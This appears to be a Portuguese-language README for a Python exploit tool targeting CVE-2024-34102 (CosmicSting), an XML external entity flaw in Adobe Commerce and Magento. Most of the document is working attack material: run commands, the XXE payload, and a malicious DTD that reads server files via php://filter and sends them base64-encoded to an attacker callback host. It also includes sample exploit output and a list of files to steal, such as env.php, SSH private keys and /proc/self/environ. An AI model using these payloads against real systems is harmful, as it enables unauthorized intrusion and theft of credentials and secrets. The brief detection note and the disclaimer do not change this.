
CVE-2024-34102 exploit for python3
Exploit para CVE-2024-34102 (CosmicSting) - Vulnerabilidade de Entidade Externa XML (XXE) no Adobe Commerce e Magento.
CVE-2024-34102 é uma vulnerabilidade crítica de XXE (Entidade Externa XML) que afeta:
Esta vulnerabilidade permite que um atacante não autenticado:
Pontuação CVSS: 9.8 (Crítica)
Este exploit é baseado no trabalho original de:
# Clone o repositório
git clone https://github.com/SEU_USUARIO/CVE-2024-34102.git
cd CVE-2024-34102
# Instale as dependências
pip install -r requirements.txt
python3 exploit.py \
-u https://alvo.com \
-f /etc/passwd \
-c seu-callback.oastify.com
Terminal 1 - Servidor DTD:
sudo python3 server_dtd.py
Terminal 2 - Exploit:
python3 exploit.py \
-u https://alvo.com \
-f /etc/passwd \
-c seu-callback.oastify.com \
--dtd-server SEU-IP:8000
Terminal 1 - Servidor DTD:
sudo python3 server_dtd.py
Terminal 2 - Servidor de Callback (auto-decodifica):
sudo python3 callback_server.py
Terminal 3 - Exploit:
python3 exploit.py \
-u https://alvo.com \
-f /etc/passwd \
-c SEU-CALLBACK-IP \
--dtd-server SEU-DTD-IP:8000
-u, --url - URL do alvo (domínio base)-f, --file - Arquivo a ser lido do servidor (ex.: /etc/passwd)-c, --callback - Servidor de callback (IP/domínio)--dtd-server - Servidor personalizado para hospedar o arquivo DTD--https - Usar HTTPS para o callback (padrão: HTTP)python3 exploit.py \
-u https://site-vulneravel.com \
-f /etc/passwd \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://site-vulneravel.com \
-f /var/www/html/app/etc/env.php \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://site-vulneravel.com \
-f /home/ubuntu/.ssh/id_rsa \
-c abc123.burpcollaborator.net \
--dtd-server 192.168.1.100:8000 \
--https
O exploit usa a técnica XXE Fora de Banda para exfiltrar dados:
<!-- Payload enviado ao alvo -->
<!DOCTYPE r [
<!ENTITY % sp SYSTEM "http://seu-servidor/exploit.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
O servidor alvo baixa o DTD malicioso:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">
O servidor processa o XML, lê o arquivo, codifica em base64 e envia para o callback:
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Alvo: https://site-vulneravel.com
[+] Servidor de Callback: abc123.oastify.com
[+] Usando servidor DTD personalizado: 192.168.1.100:8000
[+] URL DTD: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http
O DTD será gerado dinamicamente com:
[*] Callback: http://abc123.oastify.com
[*] Arquivo: /etc/passwd
O servidor DTD está rodando? Pronto para continuar? [s/N]: s
[+] Arquivo alvo: /etc/passwd
[+] URL de Callback: http://abc123.oastify.com/?exploited=...
[*] Enviando payload XXE para: https://site-vulneravel.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Status da resposta: 500
[!] Status 500 - Isso é normal! O XXE pode ter sido acionado.
[!] Verifique seu servidor de callback em busca de requisições recebidas.
[*] Aguardando callback (5 segundos)...
=== VERIFIQUE SEU SERVIDOR DE CALLBACK ===
[!] Monitore seu serviço de callback por requisições HTTP recebidas
[!] Requisição esperada: http://abc123.oastify.com/?exploited=<dados_base64>
Para decodificar os dados exfiltrados:
[*] echo 'STRING_BASE64' | base64 -d
[!] Verifique seu painel Burp Collaborator ou Oastify agora!
Detecção:
/rest/V1/guest-carts/*/estimate-shipping-methods<!ENTITY)Mitigação:
Arquivos interessantes para testar:
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ
Este exploit é fornecido apenas para fins educacionais e de pesquisa em segurança.
Usar este código para testar sistemas sem autorização explícita é ILEGAL.
Você é o ÚNICO responsável por suas ações. Use apenas em:
✅ Seus próprios ambientes de teste
✅ Programas de bug bounty autorizados
✅ Testes de penetração contratados
NÃO use em:
❌ Sistemas sem autorização
❌ Ambientes de produção sem permissão
❌ Qualquer atividade maliciosa
O autor não se responsabiliza pelo uso indevido deste código.
⭐ Se este projeto foi útil, considere dar uma estrela!